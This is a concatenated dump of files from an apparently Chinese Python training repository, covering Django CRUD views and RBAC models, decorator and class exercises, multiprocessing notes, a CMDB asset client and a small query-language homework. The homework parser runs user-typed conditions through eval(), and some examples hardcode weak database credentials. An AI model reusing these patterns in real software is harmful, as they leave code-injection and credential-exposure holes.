request.GET.get("id") # 去数据库里面删除 models.User.objects.get(id=del_id).delete() # 返回展示页面 return redirect("/show_user/") # 编辑用户 def edit_user(request): if request.method == "POST": edit_id = request.POST.get("id") new_user = request.POST.get("username") new_pwd = request.POST.get("password") obj = models.User.objects.get(id=edit_id) obj.username = new_user obj.password = <PASSWORD>) try: obj.save() except Exception: data = '用户名已经存在' return render(request, "edit_user.html", {"data": data}) return redirect("/show_user/") else: edit_id = request.GET.get("id") obj = models.User.objects.get(id=edit_id) v = request.session.get('user') if v: # 把要编辑的用户展示在这个页面上面 return render(request, "edit_user.html", {"user": obj, "v": v}) else: return redirect("/login/") def add_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名和密码不能为空' return render(request, "add_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "add_user.html", {"data": data}) return redirect("/show_user/") else: v = request.session.get('user') if v: return render(request, "add_user.html",{"v":v}) else: return redirect("/login/")<file_sep>/day4/装饰器进阶.py ##装饰器 ##同时管理多个被装饰的函数是否执行这个装饰器 # import time # flag = True # def manage(flag): # def timer(f1): # def inner(*args,**kwargs): # if flag == True: # start_time = time.time() # ret = f1(*args,**kwargs) ##func() # end_time = time.time() # print("这个函数花费了%s" %(end_time-start_time)) # return ret # else: # ret = f1(*args, **kwargs) # return ret # return inner # return timer # @manage(flag) ##func=timer(func) ##inner # def func(a,b): # print("heloo word") # print(a,b) # time.sleep(0.1) # return 222 # ret2 = func(222,333)##inner(222,333) # print(ret2) ''' ##两个装饰器装饰一个函数 def wrapper1(f1): ##第三部 func def inner1(*args,**kwargs): print("我是wrapper1,func before") ##第二部 ret = f1(*args,**kwargs) ##inner2 print("我是wrapper1,func after") return ret return inner1 ##第四步,返回给wraper1 def wrapper2(f1): ##第七步 f1 = inner1 def inner2(*args,**kwargs): ##第十一 print("我是wrapper2,func before") ret = f1(*args,**kwargs) ##inner1 print("我是wrapper,func after ") return ret return inner2 ##第八步 inner2返回给了wrapper2 @wrapper2 第五步 f=wrapper2(f) == f=wrapper2(inner1)##执行了inner1 f=inner2 @wrapper1 ##第二步 f = wrapper1(f) f = wrapper1(inner1) f=inner1 def func():## 第一步 print("我是func") func() ##第十部 即func() == inner2() ''' import time login_info = {'alex': False} def login(func): # manager def inner(name): if login_info[name] != True: user = input('user :') pwd = input('pwd :') if user == 'alex' and pwd == '<PASSWORD>': login_info[name] = True if login_info[name] == True: ret = func(name) # timmer中的inner return ret return inner def timmer(f): ##第三步 f= index def inner(*args, **kwargs): start_time = time.time() ret = f(*args, **kwargs) # 调用被装饰的方法 end_time = time.time() # print(end_time - start_time) return ret return inner ##第四部 @login ##第六部:index=login(index) == inner=login(inner) @timmer ##第二部 index = timmer(index) 第五步:index = inner def index(name): ##第一步 print('欢迎%s来到博客园首页~' % name) @login @timmer # manager = login(manager) def manager(name): print('欢迎%s来到博客园管理页~' % name) index('alex') index('alex') manager('alex') manager('alex') <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/__init__.py #!/usr/bin/python # -*- coding:utf-8 -*- from config import settings from lib.module_string import import_string def get_server_info(handler,hostname=None): """ 循环所有的插件,获取所有的资产信息,然后返回 :param handler: :return: """ info = {} for name,path in settings.PLUGIN_DICT.items(): cls = import_string(path) obj = cls() result = obj.process(handler,hostname) info[name] = result return info<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/base.py #!/usr/bin/python # -*- coding:utf-8 -*- import json import requests from config import settings from ..plugins import get_server_info class BaseHandler(object): def __init__(self): self.asset_api = settings.ASSET_API def cmd(self,command, hostname=None): raise NotImplementedError('cmd must be implemented') def handler(self): """ 约束所有的派生类都必须实现handler方法 :return: """ raise NotImplementedError('handler must be implemented') class SaltAndSSHHandler(BaseHandler): def handler(self): """ 处理SSH模式下的资产采集 :return: """ from concurrent.futures import ThreadPoolExecutor # 1. 获取未采集的主机的列表 r1 = requests.get(url=self.asset_api) hostname_list = r1.json() pool = ThreadPoolExecutor(20) for hostname in hostname_list: pool.submit(self.task, hostname) def task(self, hostname): info = get_server_info(self, hostname) # 2. 发送到api r1 = requests.post( url=self.asset_api, data=json.dumps(info).encode('utf-8'), headers={ 'Content-Type': 'application/json' } ) print(r1) <file_sep>/day4/2.今日内容.py # 上午 # 装饰器 # 迭代器和生成器 # 下午 # 内置函数 和 匿名函数 # 递归函数 和 二分查找算法<file_sep>/day2/作业.py ''' 购物车需求: 1 输入正确的用户名和密码,登录成功之后,输入金额,并打印购物车列表 2 用户输入序列号,购买商品,也可以指定购买数量 3 如果你输入的金额大于你要购买的商品,则把商品添加到购物车里,然后扣钱,打印剩余金额 4 如果你输入的金额小于你要购买的商品价格,则提示你余额不足,让你重新输入金额 5 如果不想买了,则输入q退出整个程序 ''' ''' goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] m = input("请输入你的金额:") count = 0 print("id 商品 金额" ) new_list = [] #print (len(goods)) while True: for i in goods: count += 1 if count > 4: count = 1 print(str(count) + "\t" + i.get("name") + "\t" + str(i.get("price"))) shopping_id = input("请输入你想购买的商品id:").strip() if not shopping_id.isdigit() or len(goods) < int(shopping_id): print ("你输入的不符合规范,请重新输入数字:") continue num = input("请输入你想购买的个数") if not num.isdigit(): print ("只能输入数字") buytotal = int(m) * int(i.get('price')) print (buytotal) # for j in goods: # if int(shopping_id) * int(j.get('price')) < int(m): # j.get('name') # j.get('price') # new_list.append(j.get('name')+ j.get("price")+ int(num)) #print (new_list) # 打印商品列表,提示输入 工资 #选择序号,如果选择的是非数字或者大于商品id,则继续输入 #选择购买数量,如果选择的是非数字也提醒继续输入 #如果选择的商品乘以价格和数量大于你的金额,则提醒金额不足,请选择其他商品 #如果购买成功,则吧新买的商品加入到你的列表里面,最后计算价格,退出 ''' goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] money = int(input("请输入你的金额:")) new_list=[] while True: for j in goods: print ("%d %s %d" % (goods.index(j),j["name"],j["price"])) num = input("请选择你想购买的商品:") if not num.isdigit() or len(goods) < int(num): print ("你输入的不是数字,请重新输入") continue if num.isdigit(): num = int(num) jishu = input("请输入你想要购买的数量:") if not jishu:continue if jishu.isdigit(): jishu = int(jishu) if (goods[num]["price"] * jishu) < money: print ("购买成功") count = 1 while count <= jishu: new_list.append({"name":goods[num]["name"],"price":goods[num]["price"]}) count += 1 print(new_list) # count = 1 # while count <= jishu: # new_list.append(goods[jishu]["name"]) # count += 1 # print (new_list) # if int(num) * int(jishu) > int(money): # print ("你的余额不足,请购买其他商品") choiceYN = input("如果你还想继续购买请输入y,不想输入n:") if choiceYN == 'Y' or choiceYN == "Y".lower(): continue break <file_sep>/day6/例子.py ''' def person(name,sex,hp,dps): dic = {'name':name,'sex':sex,'hp':hp,'dps':dps,'bag':[]} def attack(dog): dog['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,还剩%s血'%(dic['name'],dog['name'],dog['name'],dic['dps'],dog['hp'])) dic['attack'] =attack # 把attack函数加入到dic里面 #print('dic',dic) return dic def dog(name,kind,hp,dps): dic = {'name':name,'kind':kind,'hp':hp,'dps':dps} def bite(person): person['hp'] -= dic['dps'] print('%s打了%s,%s掉了%s点血,还剩%s血'%(dic['name'],person['name'],person['name'],dic['dps'],person['hp'])) dic['bite'] = bite return dic alex=person('alex','nan',250,5) #alex 接收到了person函数即第一个dic ha2=dog('小黑','藏獒',13000,200) # ha2接收到了dog函数即第二个dic print(alex) #print(ha2) print(alex['attack']) #内部函数 print(alex['attack'](ha2)) # print(ha2) ''' # class Person(): # def __init__(self,name,sex,hp,dps): # self.name=name # self.sex=sex # self.hp = hp # self.dps =dps # alex = Person('alex','男',259,5) # print(alex.__dict__) # print(alex.name) ### # class Person:pass # alex = Person() # # print(alex) # object # print(alex.__dict__) ##默认是空字典 # alex.name = 'alex' # 给alex对象添加属性 # alex.hp = 250 # alex.dps = 5 # alex.sex = '不详' # alex.bag = [] # print(alex.__dict__) # print(Person) #类 # ''' class Person(): def __init__(self,name,hp,dps,sex): self.name=name self.hp=hp self.dps=dps self.sex=sex self.bag=[] def attack(self,dog): dog.hp -=self.dps print('%s打了%s,%s掉了%s点血,还剩%s血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) class Dog(): def __init__(self,name,hp,dps,sex): self.name=name self.hp=hp self.dps=dps self.sex=sex self.bag=[] def attack(self,dog): dog.hp -=self.dps print('%s打了%s,%s掉了%s点血,还剩%s血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) alex = Person('alex','男',259,5) ha2=Dog('小黑','藏獒',13000,200) alex.attack() ''' ##园的面积和周长 # from math import pi # class Yuan(): # def __init__(self,r): # self.r=r # def yuan_mianji(self): # return pi * self.r ** 2 # def yuan_zc(self): # return 2*pi*self.r # r=Yuan(3) # print(r.yuan_mianji()) # print(r.yuan_zc()) # class Person(): # COUNTRY = ['中国人'] # def __init__(self,name): # self.name=name # def eat(self): # print('%s在吃泔水'%self.name) # alex=Person('alex') # egon=Person('egon') # print(alex.COUNTRY) #中国人 # alex.COUNTRY=['印度人'] # print(alex.COUNTRY) #印度人 # print(egon.COUNTRY) #中国人 # Person.COUNTRY=['泰国人'] # print(egon.COUNTRY) # print(alex.COUNTRY) class Person: role = 'person' def __init__(self,name): self.name=name def walk(self): print('person is walking') print(Person.role) print(Person.walk) egg=Person('egon') print(egg.name) print(egg.walk()) <file_sep>/day15/python连接mysql/mysql 增删改.py import pymysql # username=input('请输入用户名:') # pwd=input('请输入密码:') #连接数据库 conn = pymysql.connect(host='localhost',user='root',password='123',db='user') #创建游标 cursor=conn.cursor() #增 sql="insert into t1(id,name,pwd) values (%s,%s,%s)" #res=cursor.execute(sql,(2,'hu','123')) res=cursor.executemany(sql,[(3,"root","123456"),(4,"lhf","12356"),(5,"eee","156")]) print(res) #提交 conn.commit() #关闭游标 cursor.close() #关闭连接 conn.close() <file_sep>/day9/进程/进程.py # 什么是进程 : 运行中的程序,计算机中最小的资源分配单位 # 程序开始执行就会产生一个主进程 # python中可以主进程中用代码启动一个进程 —— 子进程 # 同时主进程也被称为父进程 # 父子进程之间的代码执行是异步的,各自执行自己的 # 父子进程之间的数据不可以共享 # 主进程会等待子进程结束之后再结束 #开启一个子进程 import os import time from multiprocessing import Process # def func(num): # print(num,os.getpid()) # time.sleep(0.5) # print(num,os.getpid()) # time.sleep(0.5) # if __name__ == '__main__': # p=Process(target=func,args=(10,)) # p.start() # print(os.getpid()) # time.sleep(1) # print(os.getpid(),1) #父进程和子进程数据不可以共享,打印n为100 # n=100 # def func(): # global n # n=0 # print('------') # time.sleep(3) # if __name__ == '__main__': # Process(target=func).start() # time.sleep(1) # print(n) #开启多个子进程 # def func(n): # time.sleep(1) # print('_'*n) # if __name__ == '__main__': # l=[] # for i in range(10): # p=Process(target=func,args=(i,)) # p.start() # l.append(p) # # print('子进程开始了') # for p in l:p.join() # print('10条信息已经发送完毕') #守护进程 # 守护进程也是一个子进程 # 当主进程的代码执行完毕之后自动结束的子进程叫做守护进程 #当主进程结束的时候守护进程才结束 # def deamon_func(): # while True: # print('我还活着') # time.sleep(0.5) # def wahaha(): # for i in range(10): # time.sleep(1) # print(i*'#') # if __name__ == '__main__': # p2=Process(target=wahaha) # p2.start() # p=Process(target=deamon_func) #先执行这个 # p.daemon=True # p.start() # for i in range(3): # print(i*'##') # time.sleep(1) # p2.join() #当主进程代码执行结束之后,守护进程就结束 def deamon_func(): while True: print('我还活着') time.sleep(0.5) def wahaha(): for i in range(10): time.sleep(1) print(i*'#') if __name__ == '__main__': p2=Process(target=wahaha) p2.start() p=Process(target=deamon_func) #先执行这个 p.daemon=True p.start() for i in range(3): print(i*'*') time.sleep(1) # 开启一个子进程 start # 子进程和主进程是异步 # 如果在主进程中要等待子进程结束之后再执行某段代码:join # 如果有多个子进程 不能在start一个进程之后就立刻join,把所有的进程放到列表中,等待所有进程都start之后再逐一join # 守护进程 —— 当主进程的"代码"执行完毕之后自动结束的子进程叫做守护进程 # # def deamon_func(): # while True: # print('我还活着') # time.sleep(0.5) # if __name__ == '__main__': # p=Process(target=deamon_func) # p.daemon=True # p.start() # for i in range(3): # print(i*'#') # time.sleep(1) <file_sep>/day22/new/rbac/admin.py from django.contrib import admin from rbac import models admin.site.register(models.UserInfo) admin.site.register(models.Role) # Register your models here. # 自定义一个权限管理类 class PermissionAdmin(admin.ModelAdmin): # 告诉django admin在页面上展示我这张表的那些字段 list_display = ["title","url","is_menu","icon"] # 在列表页面可以编辑url list_editable = ["url","icon","is_menu"] admin.site.register(models.Permission,PermissionAdmin) <file_sep>/day18/练习/orm多对多.py import os if __name__=='__main__': if __name__ == '__main__': os.environ.setdefault("DJANGO_SETTINGS_MODULE", "练习.settings") import django django.setup() from app01 import models # add方法和set方法 ''' author_obj=models.Author.objects.first() ret=author_obj.books.first().title print(ret) author_obj.books.set([2,502,503,501]) # 为作者添加三本书 作者id在前,书名id在后 author_obj.books.add(504) # add在原来的基础上增加 set删除原来的然后在设置新的 ret=author_obj.books.all().values_list("title") print(ret) ''' #查询操作 # 查询第一个作者写过书的名字 #1 基于对象的查询正向查找 ret=models.Author.objects.first().books.all().values("title") print(ret) #基于对象的反向查找 # 默认按照表名_set.all() ret = models.Book.objects.last().authors.all().values("name") print(ret) #基于queryset的双下滑线查询 # ret = models.Author.objects.filter(id=2).values("books__title") #查询id为2作者写的书 # print(ret) # 基于queryset的双下滑线的反向查找,由书找作者(两张写法) res=models.Book.objects.filter(id=504).values_list("authors__name") res1=models.Book.objects.filter(id=504).values("authors__name") # print(res,res1) <file_sep>/day7/student_guanlisystem/bin/start.py import sys import os sys.path.append(os.path.dirname(os.path.dirname(__file__))) from core import core if __name__=='__main__': core.main()<file_sep>/day4/练习题.py # 1.使用lamda表达下面函数。 # def func(x, y): # return x+y # print(func(2,3)) # # ret = lambda x,y:x+y # print(ret(2,3)) 2#为这些基础函数加一个装饰器,执行对应函数内容后, # 将当前时间写入一个文件做一个日志记录。 # import time # def timer(f): # def inner(*args,**kwargs): # local_time = time.time() # # def foo(): # print('hello foo') # return () # # # def bar(): # print('hello bar') #3. 通过内置函数计算5除以2的余数 # #4. 现有两元祖 (('a'),('b'),('c'),('d') ) ,请使用Python中的匿名函数生成列表 # [ {'a':'c',{'c':'d'}] # ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) ''' #4 按年龄由大到小排列 alist = [{'name':'a','age':20},{'name':'b','age':30},{'name':'c','age':25}] ret = sorted([i.get('age') for i in alist ],reverse=True) print(ret) ''' #6使用内置函数输出 [(1, 'h'), (2, 'e'), (3, 'l')] # l1=[1,2,3,4] # s='hel' # ret = zip(l1,s) # print(list(ret)) #7. 输出钱大于20的人名 结果为['IBM', 'Lenovo', 'oldboy'] shares = { "IBM": 36.6, "Lenovo": 23.2, "oldboy": 21.2, "ocean": 10.2 } # ret = sorted(([i[0] for i in shares.items() if i[1] > 20])) # print(ret) #8. name=['alex','wupeiqi','yuanhao'] #将每个人名后加_sb 结果为['alex_sb','wupeiqi_sb','yuanhao_sb'] # name=['alex','wupeiqi','yuanhao'] # print([i+"_sb" for i in name]) #9. 输出钱最多的人名 结果为alex salaries={ 'egon':3000, 'alex':100000000, 'wupeiqi':10000, 'yuanhao':250 } # ret = sorted([i[0] for i in salaries.items()],reverse=True) # print(ret) # ret1 = sorted(salaries,key=lambda item:item[0]) # print(ret1[0]) print(max(salaries,key=lambda k:salaries[k])) #10,2 print(sorted(salaries,key=lambda k:salaries[k])) <file_sep>/day27/s21crm/crm/middlewares/auth.py import re from django.utils.deprecation import MiddlewareMixin from django.shortcuts import redirect from django.conf import settings class AuthMiddleware(MiddlewareMixin): def process_request(self, request): """ 检查用户登录的中间件 :param request: :return: """ for url in settings.AUTH_VALID_URL: if re.match(url, request.path_info): return None next_url = request.path_info user_info = request.session.get('user_info') if not user_info: return redirect('/login/') <file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/1.错误堆栈信息.py #!/usr/bin/python # -*- coding:utf-8 -*- import traceback def f1(): result = 123 int('asdf') return result def run(): try: ret = f1() print(ret) except Exception as e: msg = traceback.format_exc() print('错误的堆栈信息') run()<file_sep>/day4/优秀的作业/优秀的作业/常莉莉/homework/homework.py #!/usr/bin/env python #coding:utf-8 #Filename: homework #Author: chang #DATE: 2018-05-05 07:05 import re import os class staff(): def __init__(self): pass def get_staff_info(self,file): if (os.path.exists(file))==False: print("查询的表不存在!") return else: with open (file,encoding="utf-8",mode="r") as f: content_row1=f.readline() title=content_row1.strip().split(",") lenth=len(title) staff_info=[] for i in f: staff_dic={} data = i.strip().split(",") for j in range(lenth): staff_dic.setdefault(title[j], data[j]) staff_info.append(staff_dic) return staff_info def print_info(self,row_name,staff_temp): if row_name == '*': print(staff_temp) else: info = row_name.split(',') res = {} for i in info: #print (i) if i.strip() in staff_temp.keys(): res.setdefault(i.strip(),staff_temp.get(i.strip())) else: print("查询的列不存在") return print(res) def logic_cal(self,staff_temp,logic_exp): logic_exp = re.search('(.+?)([=<>]{1,2}|like)(.+)', ''.join(logic_exp)) # 表达式列表优化成三个元素,形如[‘age','>=',20] 或 [‘dept','like','HR'] if (logic_exp): logic_exp = list(logic_exp.group(1, 2, 3)) if logic_exp[1]=="=": logic_exp[1]="==" if logic_exp[1] == 'like': # 运算符为like的表达式运算 return re.search(logic_exp[2].strip("'").strip('"'), staff_temp.get(logic_exp[0])) and True elif (logic_exp[0].isdigit() and logic_exp[2].isdigit()): # 两头为数字的运算,直接eval函数转数学表达式 return eval(''.join(logic_exp)) elif (logic_exp[1] in ("==",">","<")): # 非数字的运算,即字符串运算,此时逻辑符只可能是‘=',若用eval函数则字符串会转成无定义变量而无法计算,所以拿出来单独用"=="直接计算 eval_list=[staff_temp.get(logic_exp[0]),logic_exp[1],logic_exp[2]] return(eval("".join(eval_list))) # 字符串相等判别,同时消除指令中字符串引号的影响,即输引号会比记录中的字符串多一层引号 else: # 其他不合语法的条件格式输出直接返回False return False else: return False def verify(self,staff_temp, condition): if condition=='': return True condition_list = condition.split() if len(condition_list) == 0: return False logic_str = ['and', 'or', 'not'] # 逻辑运算字符串 且、或、非 logic_exp = [] # 单个条件的逻辑表达式组成的列表,形如[‘age',' ','>','=',20] 或 [‘dept',' ','like',' ','HR'] logic_list = [] # 每个条件的表达式的计算结果再重组后的列表,形如 [‘True','and','False','or','not','False'] for i in condition_list: if i in logic_str: if (len(logic_exp) != 0): logic_list.append(str(self.logic_cal(staff_temp, logic_exp))) # 逻辑表达式计算并将返回的True或False转化成字符串添加到列表 logic_list.append(i) logic_exp = [] else: logic_exp.append(i) logic_list.append(str(self.logic_cal(staff_temp, logic_exp))) return eval(' '.join(logic_list)) # 列表转化成数学表达式完成所有条件的综合逻辑运算,结果为True或False def select(self,command): command_phrase=re.findall(r"select(.*?)from(.*)",command) #print(command_phrase) if command_phrase: rows_name=command_phrase[0][0].strip() info=command_phrase[0][1].strip() if info.count("where ")>0: m=re.findall(r"(.*?)where(.*)",info) table_name=m[0][0].strip() condition=m[0][1].strip() else: table_name=info condition="" count = 0 staff_list = [] staff_temp=self.get_staff_info(table_name) if staff_temp: for i in staff_temp: if (self.verify(i, condition)): # 验证员工信息是否符合条件 count += 1 staff_list.append(i) print("数据库本次共\033[31;1m查询到%d条\033[0m员工信息,如下:" % count) for staff_temp in staff_list: self.print_info(rows_name,staff_temp) # 查询记录打印 else: print("语法错误") def insert(self,command): pass def update(self,command): pass def delete(self,command): pass def func(self): func_dic={ "select":self.select, "insert":self.insert, "update":self.update, "delete":self.delete, } while (True): command=input("请按照语法输入指令并以分号结束,退出请输入exit:").strip() func=func_dic.get(command.split(" ")[0], "error") if command.lower()=="exit": print("数据库操作结束") break elif func == "error": print("指令不存在,请重新输入!") else: func(command) if __name__=="__main__": sf=staff() #print (sf.get_staff_info("staff")) sf.func() <file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/templatetags/ooxx.py from django.template import Library from django.conf import settings import copy register = Library() # 定义一个函数 # @register.simple_tag() # def show_menu(a): # return '999' @register.inclusion_tag('menu.html') def get_menu(request): new_menu_list = copy.deepcopy(settings.MENU_LIST) flag = False for item in new_menu_list: for child in item['children']: if request.path_info == child['url']: child['class'] = 'active' # 子类class item['class'] = '' # 父 类class flag = True break if flag: break return {'menu_list':new_menu_list} <file_sep>/day19/homework/s21/app01/migrations/0005_delete_publisher.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-14 07:46 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('app01', '0004_publisher_user'), ] operations = [ migrations.DeleteModel( name='Publisher', ), ] <file_sep>/test.py # # n=0 # # while n<=100: # # n=n+1 # # num=n%2 # # if num==0: # # print(n) # # # # with open("cy_ip_list",encoding="utf-8",mode='r') as f1, open("error_list",encoding="utf-8",mode='r') as f2: # count = 0 # for i in f2: # i = i.strip() # # print(i) # for ip in f1: # ip=ip.strip() # # print(ip) # # if count == 0: # # print(count) # # # pass # # print(ip.strip()) # # if i in ip: # # print(ip.strip()) # f1.seek(0) # break # count += 1 <file_sep>/day8/ceshi.py # import glance.api.policy as hnf # hnf.get() # # import glance.api.policy # glance.api.policy.get() # # from glance.api import policy # policy.get() #导入一个文件相当于执行了这个文件中的代码 #导入一个包相当于执行这个包中的init文件 #import 后面的这个名字,永远会出现在全局的命名空间里 import glance #绝对导入,其余的在init文件里面实现 #在glace里面的init文件里写的:from glance import api #在api里面的init文件里写的:from glance.api import policy glance.api.policy.get() #相对导入 import glance #在glace里面的init文件里写的:from . import api #在api里面的init文件里写的:from .import policy glance.api.policy.get() <file_sep>/deploy/link.py #!/usr/bin/python # -*- coding: UTF-8 -*- import os src = '/home/yx/code' dst = '/home/yx/servie' # 创建软链接 os.symlink(src, dst) print("软链接创建成功") <file_sep>/day8/udp_client.py import socket sk=socket.socket(type=socket.SOCK_DGRAM) while True: inp=input('>>>') if inp=='q':break sk.sendto(inp.encode('utf-8'),('127.0.0.1',8899)) ret=msg,addr=sk.recvfrom(1024) print(msg.decode('utf-8')) if msg.decode('utf-8') =='q':break sk.close()<file_sep>/复习/常用模块.py # orderedict有序字典 import collections # d = collections.OrderedDict() # # d['苹果'] = 10 # d['手机']=5000 # print(d) # for i in d: # print(i,d[i]) # defaultdict 默认字典 # # 例子:小于66的放到k2,大于66的放到k1,形成一个新字典 from collections import defaultdict l= [11, 22, 33, 44, 55, 66, 77, 88, 99, 90] new_dict = defaultdict(list) for value in l: if value > 66: new_dict['k1'].append(value) else: new_dict['k2'].append(value) print(new_dict)<file_sep>/student_guanli_system/db/passwd.py import hashlib # with open('../db/userinfo')as f: # print(f.read()) # username='hnf' # md5obj=hashlib.md5(username.encode('utf-8')) # md5obj.update('123'.encode('utf-8'))# 使用md5算法的对象来操作字符串里面必须是bytes类型 # ret=md5obj.hexdigest() # print(ret) import sys print(sys.modules[__name__])<file_sep>/deploy/deploy/urls.py """deploy URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from web.views import account from web.views import project from web.views import depart from web.views import host from web.views import user from web.views import deploy from web.views import script urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^login/$', account.login, name='login'), url(r'^check/code/$', account.check_code, name='check_code'), # 验证码路径 # 部门url url(r'^depart/list/$', depart.depart_list, name='depart_list'), url(r'^depart/add/$', depart.depart_add, name='depart_add'), url(r'^depart/edit/(\d+)/$', depart.depart_edit, name='depart_edit'), url(r'^depart/del/(\d+)/$', depart.depart_del, name='depart_del'), # host主机 url(r'^host/list/$', host.host_list, name='host_list'), url(r'^host/add/$', host.host_add, name='host_add'), url(r'^host/edit/(\d+)/$', host.host_edit, name='host_edit'), url(r'^host/del/(\d+)/$', host.host_del, name='host_del'), # 用户列表 url(r'^user/list/$', user.user_list, name='user_list'), url(r'^user/add/$', user.user_add, name='user_add'), url(r'^user/edit/(\d+)/$', user.user_edit, name='user_edit'), url(r'^user/del/(\d+)/$', user.user_del, name='user_del'), # 项目 url(r'^project/list/$', project.project_list, name='project_list'), url(r'^project/add/$', project.project_add, name='project_add'), url(r'^project/edit/(\d+)/$', project.project_edit, name='project_edit'), url(r'^project/del/(\d+)/$', project.project_del, name='project_del'), # 发布任务 url(r'^deploy/list/(?P<project_id>\d+)/$', deploy.deploy_list, name='deploy_list'), # 添加发布任务 url(r'^deploy/add/(?P<project_id>\d+)/$', deploy.deploy_add, name='deploy_add'), url(r'^deploy/edit/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_edit, name='deploy_edit'), url(r'^deploy/del/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_del, name='deploy_del'), # url(r'^deploy/rollback/(?P<project_id>\d+)/(?P<nid>\d+)/$', deploy.deploy_rollback, name='deploy_rollback'), # 拉代码 url(r'^deploy/fetch/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_fetch, name='deploy_fetch'), # 上传代码 url(r'^deploy/push/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_push, name='deploy_push'), # url(r'^deploy/rollback_list/(?P<project_id>\d+)/$', deploy.deploy_rollback_list, name='deploy_rollback_list'), # 回滚 url(r'^deploy/rollback/(?P<project_id>\d+)/(?P<deploy_id>\d+)/$', deploy.deploy_rollback, name='deploy_rollback'), # script url(r'^script/list/$',script.script_list,name='script_list'), url(r'^script/add/$',script.script_add,name='script_add'), url(r'^script/edit/(\d+)/$',script.script_edit,name='script_edit'), url(r'^script/del/(\d+)/$',script.script_del,name='script_del') ] <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/urls.py from django.conf.urls import url from api import views urlpatterns = [ # url(r'^asset/$',views.asset), url(r'^asset/$',views.AssetView.as_view()), ] <file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/数据.py # permission_menu_list = [ # { # 'permissions__title': '用户列表', # 'permissions__url': '/app01/user/', # 'permissions__name': 'user_list', # 'permissions__menu_id': 1, # 'permissions__menu__title': '用户管理', # 'permissions__menu__icon': 'fa-clipboard', # 'permissions__parent_id': None, # 'permissions__parent__name': None # }, # { # 'permissions__title': '添加用户', # 'permissions__url': '/app01/user/add/', # 'permissions__name': 'user_add', # 'permissions__menu_id': None, # 'permissions__menu__title': None, # 'permissions__menu__icon': None, # 'permissions__parent_id': 1, # 'permissions__parent__name': 'user_list' # }, # { # 'permissions__title': '编辑用户', # 'permissions__url': '/app01/user/edit/(\\d+)', # 'permissions__name': 'user_edit', # 'permissions__menu_id': None, # 'permissions__menu__title': None, # 'permissions__menu__icon': None, # 'permissions__parent_id': 1, # 'permissions__parent__name': 'user_list' # }, # { # 'permissions__title': '订单列表', # 'permissions__url': '/app01/order/', # 'permissions__name': 'order', # 'permissions__menu_id': 2, # 'permissions__menu__title': '商品管理', # 'permissions__menu__icon': 'fa-clipboard', # 'permissions__parent_id': None, # 'permissions__parent__name': None # } # ] # # for i in permission_menu_list: # print(i.get('permissions__name')) # print(i.get('permissions__url')) ##################################################################### permission_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] menu_list = {} for item in permission_list: id = item['permissions__menu_id'] title = item['permissions__menu__title'] icon = item['permissions__menu__icon'] menu_title = item['permissions__title'] url = item['permissions__url'] menu_list[id] ={ 'title': title, 'icon': icon, 'children': [ {'title': menu_title, 'url': url} ] } print(menu_list) <file_sep>/deploy/web/forms/user.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class UserModelForm(BootStrapModelForm): class Meta: model = models.UserInfo fields = "__all__"<file_sep>/day23/auto - 2 - 固定二级菜单示例/rbac/models.py from django.db import models class User(models.Model): ''' 用户表 ''' name = models.CharField(verbose_name='用户名', max_length=32) password = models.CharField(verbose_name='密码', max_length=64) roles = models.ManyToManyField(verbose_name='关联角色', to="Role", null=True, blank=True) class Role(models.Model): ''' 角色表 ''' role = models.CharField(verbose_name='角色名', max_length=32) permissions = models.ManyToManyField(verbose_name='关联权限', to="Permission") class Menu(models.Model): ''' 菜单表 ''' title = models.CharField(verbose_name='菜单名字', max_length=64) icon = models.CharField(verbose_name='图标名称', max_length=128) class Permission(models.Model): ''' 权限表 ''' url = models.CharField(verbose_name='url(含正则)', max_length=128) title = models.CharField(verbose_name='菜单名字', max_length=64) name = models.CharField(verbose_name='url别名', max_length=64, unique=True) menu = models.ForeignKey(verbose_name='关联菜单表', to='Menu', null=True, blank=True) # null数据库可以为空,blank django是空 parent = 